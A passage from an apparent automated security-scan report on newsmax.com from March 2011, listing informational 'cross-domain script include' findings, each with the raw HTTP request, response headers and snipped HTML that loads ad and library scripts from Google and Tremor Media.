User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 43976
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:10:12 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

2.73. http://www.newsmax.com/blogs/JackieGingrich/id-96  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /blogs/JackieGingrich/id-96

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blogs/JackieGingrich/id-96 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 44158
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:09:29 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

2.74. http://www.newsmax.com/blogs/JohnBerlau/id-65  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /blogs/JohnBerlau/id-65

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blogs/JohnBerlau/id-65 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 44187
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:09:35 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

2.75. http://www.newsmax.com/blogs/KenTimmerman/id-90  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /blogs/KenTimmerman/id-90

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blogs/KenTimmerman/id-90 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 44422
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:08:18 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

2.76. http://www.newsmax.com/blogs/LannyDavis/id-43  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /blogs/LannyDavis/id-43

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blogs/LannyDavis/id-43 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 44086
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:08:55 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

2.77. http://www.newsmax.com/blogs/Limbaugh/id-36  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /blogs/Limbaugh/id-36

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blogs/Limbaugh/id-36 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 44020
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:09:25 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

2.78. http://www.newsmax.com/blogs/Miller/id-117  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /blogs/Miller/id-117

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blogs/Miller/id-117 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 43972
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:08:11 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

2.79. http://www.newsmax.com/blogs/Murdock/id-108  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /blogs/Murdock/id-108

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blogs/Murdock/id-108 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 43984
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:08:37 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

2.80. http://www.newsmax.com/blogs/RonaldKessler/id-69  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /blogs/RonaldKessler/id-69

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blogs/RonaldKessler/id-69 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 44390
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:08:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

2.81. http://www.newsmax.com/blogs/deBorchgrave/id-80  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /blogs/deBorchgrave/id-80

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blogs/deBorchgrave/id-80 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 44239
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:08:36 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

2.82. http://www.newsmax.com/contact  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /contact

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /contact HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,no-cache, must-revalidate
Pragma: no-cache
Content-Length: 33292
Content-Type: text/html
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 13:59:21 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

2.83. http://www.newsmax.com/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /default.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /default.aspx HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 77234
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:14:17 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<!-- Acudeo companion banner loader script -->
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script>
...[SNIP]...
<div class="demo unicorn_vertplayer_playlistdiv">
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script>
...[SNIP]...

2.84. http://www.newsmax.com/hottopics/topic/2012-President-Race/116  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /hottopics/topic/2012-President-Race/116

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /hottopics/topic/2012-President-Race/116 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 40570
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:13:56 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

2.85. http://www.newsmax.com/hottopics/topic/Airport-Security/132  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /hottopics/topic/Airport-Security/132

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /hottopics/topic/Airport-Security/132 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 31440
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:13:45 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

2.86. http://www.newsmax.com/hottopics/topic/Barack-Obama/67  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /hottopics/topic/Barack-Obama/67

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /hottopics/topic/Barack-Obama/67 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 40546
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:13:54 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

2.87. http://www.newsmax.com/hottopics/topic/Donald-Trump/138  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /hottopics/topic/Donald-Trump/138

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /hottopics/topic/Donald-Trump/138 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 34994
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:13:43 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

2.88. http://www.newsmax.com/hottopics/topic/Egypt-Unrest/136  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /hottopics/topic/Egypt-Unrest/136

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /hottopics/topic/Egypt-Unrest/136 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 40313
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:13:44 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

2.89. http://www.newsmax.com/hottopics/topic/Exclusive-Interviews/69  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /hottopics/topic/Exclusive-Interviews/69

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /hottopics/topic/Exclusive-Interviews/69 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 41302
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:12:37 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

